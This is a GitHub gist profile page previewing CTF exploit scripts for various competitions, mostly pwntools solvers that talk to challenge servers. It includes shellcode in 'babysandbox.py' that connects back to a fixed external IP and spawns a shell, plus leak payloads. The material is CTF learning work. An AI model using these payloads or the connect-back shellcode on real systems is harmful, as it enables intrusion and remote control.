Skip to content

Instantly share code, notes, and snippets.

View ujin5's full-sized avatar

ujin5

80 followers · 12 following
View GitHub Profile
@ujin5
ujin5 / labyrinth.py
Last active July 10, 2017 04:12
sctf writeups
from pwn import *
def make(name,email,width,height,info,dat):
s.recvuntil('>')
s.sendline('1')
s.recvuntil('NAME>')
s.sendline(name)
s.recvuntil('EMAIL>')
s.sendline(email)
s.recvuntil('WIDTH>')
s.sendline(width)
@ujin5
ujin5 / solve.py
Created August 21, 2017 01:01
sctf 2017 report writeups
from pwn import *
import json
from ctypes import *
REMOTE = 1
if REMOTE == 1:
s = remote('report.eatpwnnosleep.com',55555)
a = {
'apikey' : "e54aa9929975face3253fb6e261f3a7c15701dface66a5a63ac2fdea555e745d",
}
@ujin5
ujin5 / readme.md
Last active November 7, 2017 15:16
HITCON 2017 Quals : Ragnarok Writeup

Ragnarok

1. Vulnerability

virtual void add_weapon(string str){
	if(weapon.empty()){
		weapon = str ;
 if(!weapon.compare("Droupnir")){
@ujin5
ujin5 / solve.py
Created November 20, 2017 03:09
kikikiki
from pwn import *
#s = remote('192.168.0.12',1234)
s =remote('10.10.134.127', 30004)
def add(name):
s.recvuntil('>>>')
s.sendline('1')
s.recvuntil('name')
s.send(name)
@ujin5
ujin5 / solve.py
Created November 20, 2017 03:09
kikikiki
from pwn import *
#s = remote('192.168.0.12',1234)
s =remote('10.10.134.127', 30004)
def add(name):
s.recvuntil('>>>')
s.sendline('1')
s.recvuntil('name')
s.send(name)
@ujin5
ujin5 / babysandbox.py
Last active July 15, 2018 22:02
meepwn 2018
from pwn import *
'''
this sandbox separate binary and unicorn engine.
So, add dependency code on binary, unicorn engine unintentional execute shellcode.
'''
a = asm("pop eax; sub eax, 0x90; call eax",arch='i386') # dependency code on binary . go back main func
a += "A"*(0x100-len(a)) # full buffer
sc = shellcraft.i386.linux.connect('108.61.200.86', 6051, 'ipv4')
#sc = shellcraft.i386.linux.connect('localhost', 6051, 'ipv4')
sc += shellcraft.i386.linux.findpeersh(6051)
@ujin5
ujin5 / smth.py
Created August 3, 2018 03:26
smth_revenge solution
'''
there is format string bug. howerever you only use %n,%c,%d because smth use custom printf.
by using %c you leak flag.
'''
from pwn import *
p = ssh("smth_chal","pwn2.task.ctf.codeblue.jp",password="whats_smth")
dat = "DbD: Dead by Daytime Sun lololo"
k = ""
table = [chr(i) for i in range(0x1f,0x80)]
@ujin5
ujin5 / exploit.html
Created June 24, 2019 00:03
Google CTF Quals 2019 Monochromatic
<html>
<pre id='log'></pre>
<script src="mojo_bindings.js"></script>
<script src="third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>
<script src="being_creator_interface.mojom.js"></script>
<script src="food_interface.mojom.js"></script>
<script src="dog_interface.mojom.js"></script>
<script src="person_interface.mojom.js"></script>
<script src="cat_interface.mojom.js"></script>
<script>
@ujin5
ujin5 / multityped-array.py
Created August 17, 2019 13:56
whitehat 2019
from pwn import *
from ctypes import *
def convert(s):
return struct.unpack('<d', s)[0]
#s = process("./pwnme")
s = remote("15.164.131.100",9988)
def r(dat):
s.recvuntil(">")
s.sendline(dat)
@ujin5
ujin5 / babyllvm.py
Last active July 4, 2021 15:33
Codegate 2020 Quals
from pwn import *
#s = remote("0", 1234)
s = remote("58.229.240.181", 7777)
context.log_level = "debug"
s.recvuntil(">>>")
s.sendline("+[[."+"<"*0x8+"[.>]"+"<"*(0x6e+0x8)+"[.>]"+">"*(0x10-0x6)+"[,>]"+"<"*(0x6+0x10)+"[,>]"+">"*(0x80-0xe)+",>,<.]]")
base = u64(s.recvuntil("\x7f")[-6:]+"\x00\x00") - 0x201090
print "BASE @ " + hex(base)